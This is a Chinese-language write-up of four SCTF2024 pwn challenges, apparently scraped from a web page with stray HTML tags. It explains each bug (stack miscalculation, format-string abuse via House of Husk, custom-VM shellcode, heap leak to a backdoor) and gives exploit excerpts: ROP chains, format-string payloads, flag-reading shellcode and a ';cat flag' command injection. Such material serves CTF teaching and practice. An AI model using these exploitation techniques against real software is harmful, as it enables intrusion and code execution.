XCTF SCTF2024 Pwn方向题解分析<\/h1>

factory题目分析<\/h2>

题目概述<\/h3>
题目实现了一个工厂管理系统，主要功能包括：<\/p>
输入n值，使用alloca调整栈空间<\/li>
将数据读取到栈上<\/li>
printf打印这些值的和<\/li> <\/ol>
漏洞分析<\/h3>
关键漏洞点在于栈空间计算错误：<\/p>
v0 =<\/span> 0x10<\/span> *<\/span> ((4<\/span> *<\/span> n +<\/span> 0x17<\/span>) \/<\/span> 0x10uLL<\/span>);
<\/span><\/span><\/code><\/pre>当n=0x28时：<\/p>

正确计算应为alloca(0x140)<\/li>
实际计算只有0xb0

导致栈溢出漏洞<\/li>
<\/ul>
利用思路<\/h3>


思路一<\/strong>：覆盖buf为任意地址实现任意地址写<\/p>

无法控制返回地址，放弃此思路<\/li>
<\/ul>
<\/li>

思路二<\/strong>：<\/p>

覆盖i的值，跳过对buf的覆盖<\/li>
通过栈溢出覆盖返回地址<\/li>
实现ret2libc攻击<\/li>
<\/ul>
<\/li>
<\/ol>
利用步骤<\/h3>

发送n=0x28触发漏洞<\/li>
覆盖i的值控制执行流<\/li>
泄露libc地址<\/li>
构造ROP链获取shell<\/li>
<\/ol>
EXP代码关键点<\/h3>
# 触发漏洞<\/span>
<\/span><\/span>p.<\/span>sendlineafter("How many factorys do you want to build: "<\/span>, str(0x28<\/span>))
<\/span><\/span>
<\/span><\/span># 覆盖i的值<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(0x16<\/span>):
<\/span><\/span>    p.<\/span>sendlineafter(f<\/span>"factory <\/span>{<\/span>i+<\/span>1<\/span>}<\/span> "<\/span>, str(0x16<\/span>))
<\/span><\/span>p.<\/span>sendlineafter(f<\/span>"factory <\/span>{<\/span>0x17<\/span>}<\/span> "<\/span>, str(0x1d<\/span>-<\/span>1<\/span>))
<\/span><\/span>
<\/span><\/span># 构造ROP链泄露puts地址<\/span>
<\/span><\/span>pop_rdi =<\/span> 0x401563<\/span>
<\/span><\/span>puts_got =<\/span> 0x404018<\/span>
<\/span><\/span>p.<\/span>sendlineafter(f<\/span>"factory <\/span>{<\/span>30<\/span>}<\/span> "<\/span>, str(pop_rdi))
<\/span><\/span>p.<\/span>sendlineafter(f<\/span>"factory <\/span>{<\/span>31<\/span>}<\/span> "<\/span>, str(puts_got))
<\/span><\/span>p.<\/span>sendlineafter(f<\/span>"factory <\/span>{<\/span>32<\/span>}<\/span> "<\/span>, str(elf.<\/span>plt['puts'<\/span>]))
<\/span><\/span><\/code><\/pre>gocomplier题目分析<\/h2>
题目概述<\/h3>

用户输入代码被编译执行<\/li>
限制：只能使用printf和write函数<\/li>
静态链接、no-pie<\/li>
<\/ul>
漏洞利用<\/h3>


格式化字符串漏洞<\/strong>：<\/p>

通过printf实现任意写<\/li>
无法交互式泄露信息<\/li>
<\/ul>
<\/li>

House of Husk利用<\/strong>：<\/p>

覆盖__printf_function_table<\/code>和__printf_arginfo_table<\/code><\/li>
执行__printf_arginfo_table[spec]<\/code>指向的函数<\/li>
<\/ul>
<\/li>

ROP构造<\/strong>：<\/p>

使用add rsp, 0x1018; ret<\/code>调整栈位置<\/li>
最终执行system("\/bin\/sh")<\/li>
<\/ul>
<\/li>
<\/ol>
EXP关键点<\/h3>
\/\/ 覆盖printf_arginfo_table
<\/span><\/span><\/span><\/span>printf<\/span>("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%18$hhn"<\/span>)
<\/span><\/span>
<\/span><\/span>\/\/ 设置bss段上的add_rsp_ret地址
<\/span><\/span><\/span><\/span>printf<\/span>("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%15$hhn"<\/span>)
<\/span><\/span>
<\/span><\/span>\/\/ 最终ROP链
<\/span><\/span><\/span><\/span>var<\/span> pop_rdi<\/span> int<\/span> = 0x401fdf<\/span>
<\/span><\/span>var<\/span> sh_addr<\/span> int<\/span> = 0x4c88d8<\/span>
<\/span><\/span>var<\/span> pop_rsi<\/span> int<\/span> = 0x40a04e<\/span>
<\/span><\/span>var<\/span> pop_rdx_rbx<\/span> int<\/span> = 0x4859cb<\/span>
<\/span><\/span>var<\/span> pop_rax<\/span> int<\/span> = 0x40191a<\/span>
<\/span><\/span>var<\/span> syscall<\/span> int<\/span> = 0x401d94<\/span>
<\/span><\/span><\/code><\/pre>vmcode题目分析<\/h2>
虚拟机逆向<\/h3>


指令集分析<\/strong>：<\/p>

0x21: call指令<\/li>
0x22: ret指令<\/li>
0x30: syscall指令<\/li>
其他指令包括算术运算、栈操作等<\/li>
<\/ul>
<\/li>

执行流程<\/strong>：<\/p>

从code段读取字节作为opcode<\/li>
减去0x21后跳转到对应处理函数<\/li>
<\/ul>
<\/li>
<\/ol>
利用思路<\/h3>


构造shellcode实现：<\/p>

open("\/flag", 0)<\/li>
read(3, buf, 0x100)<\/li>
write(1, buf, 0x100)<\/li>
<\/ul>
<\/li>

关键技巧：<\/p>

使用push_sp + shr + shl清空rsp低8位<\/li>
不影响栈上原有数据<\/li>
<\/ul>
<\/li>
<\/ol>
EXP构造<\/h3>
def<\/span> call<\/span>(offset):
<\/span><\/span>    return<\/span> p8(0x21<\/span>) +<\/span> p16(offset)
<\/span><\/span>
<\/span><\/span>def<\/span> syscall<\/span>():
<\/span><\/span>    return<\/span> p8(0x30<\/span>)
<\/span><\/span>
<\/span><\/span># open("\/flag", 0)<\/span>
<\/span><\/span>payload =<\/span> flat([
<\/span><\/span>    push_imm(0x67616c66<\/span>),  # "\/flag"<\/span>
<\/span><\/span>    push_sp(),
<\/span><\/span>    push_imm(0x0<\/span>),
<\/span><\/span>    swap01(),
<\/span><\/span>    push_imm(0x2<\/span>),
<\/span><\/span>    syscall(),
<\/span><\/span>    
<\/span><\/span>    # read(3, buf, 0x100)<\/span>
<\/span><\/span>    push_imm(0x100<\/span>),
<\/span><\/span>    push_sp(), shr(), shl(),
<\/span><\/span>    push_imm(0x3<\/span>),
<\/span><\/span>    push_imm(0x0<\/span>),
<\/span><\/span>    syscall(),
<\/span><\/span>])
<\/span><\/span><\/code><\/pre>c_or_go题目分析<\/h2>
题目功能<\/h3>

读取JSON格式输入<\/li>
支持操作：

0: NewUser<\/li>
1: ShowUser<\/li>
2: DeleteUser<\/li>
-1: 特殊功能(后门)<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h3>


后门功能<\/strong>：<\/p>

检查输入是否等于&puts地址<\/li>
满足条件则执行命令<\/li>
<\/ul>
<\/li>

利用步骤<\/strong>：<\/p>

通过malloc_consolidate泄露libc地址<\/li>
计算puts地址<\/li>
触发后门执行cat flag<\/li>
<\/ul>
<\/li>
<\/ol>
EXP关键代码<\/h3>
# 触发malloc_consolidate<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(9<\/span>):
<\/span><\/span>    add_wrap(b<\/span>"qaq"<\/span>, b<\/span>"q"<\/span>*<\/span>0x30<\/span>, 0x60<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(9<\/span>):
<\/span><\/span>    delete_wrap(b<\/span>"qaq"<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露libc地址<\/span>
<\/span><\/span>add_wrap(b<\/span>"qaq"<\/span>, b<\/span>"q"<\/span>*<\/span>0x410<\/span>, 0x30<\/span>)
<\/span><\/span>add_wrap(b<\/span>"target"<\/span>, b<\/span>"q"<\/span>, 0x60<\/span>)
<\/span><\/span>show_wrap(b<\/span>"target"<\/span>)
<\/span><\/span>libc.<\/span>address =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x1ecc71<\/span>
<\/span><\/span>
<\/span><\/span># 触发后门<\/span>
<\/span><\/span>p.<\/span>sendlineafter("input your tasks"<\/span>, json.<\/span>dumps(
<\/span><\/span>    [check(hex(libc.<\/span>sym["puts"<\/span>]).<\/span>encode()+<\/span>b<\/span>"<\/span>\x00<\/span>"<\/span>, b<\/span>";cat flag"<\/span>, 0x10<\/span>)]
<\/span><\/span>))
<\/span><\/span><\/code><\/pre>总结与技巧<\/h2>


栈溢出利用<\/strong>：<\/p>

注意栈对齐和空间计算<\/li>
考虑覆盖顺序对利用的影响<\/li>
<\/ul>
<\/li>

格式化字符串高级利用<\/strong>：<\/p>

静态链接环境下考虑House of Husk<\/li>
精确计算偏移和写入值<\/li>
<\/ul>
<\/li>

虚拟机题目<\/strong>：<\/p>

耐心逆向指令集<\/li>
构造符合虚拟机规范的shellcode<\/li>
<\/ul>
<\/li>

JSON交互题目<\/strong>：<\/p>

优先分析字符串提示<\/li>
注意base64编码的使用<\/li>
<\/ul>
<\/li>

通用技巧<\/strong>：<\/p>

动态调试至关重要<\/li>
合理使用ROPgadget等工具<\/li>
注意内存布局和地址计算<\/li>
<\/ul>
<\/li>
<\/ol>